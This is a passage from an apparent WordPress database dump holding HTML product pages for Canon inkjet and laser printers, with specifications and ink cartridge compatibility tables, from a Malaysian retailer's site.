width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:08:14','2019-09-24 08:08:14','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3302,1,'2019-09-24 16:14:21','2019-09-24 08:14:21','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><p>Â </p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center><p>Â </p>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td 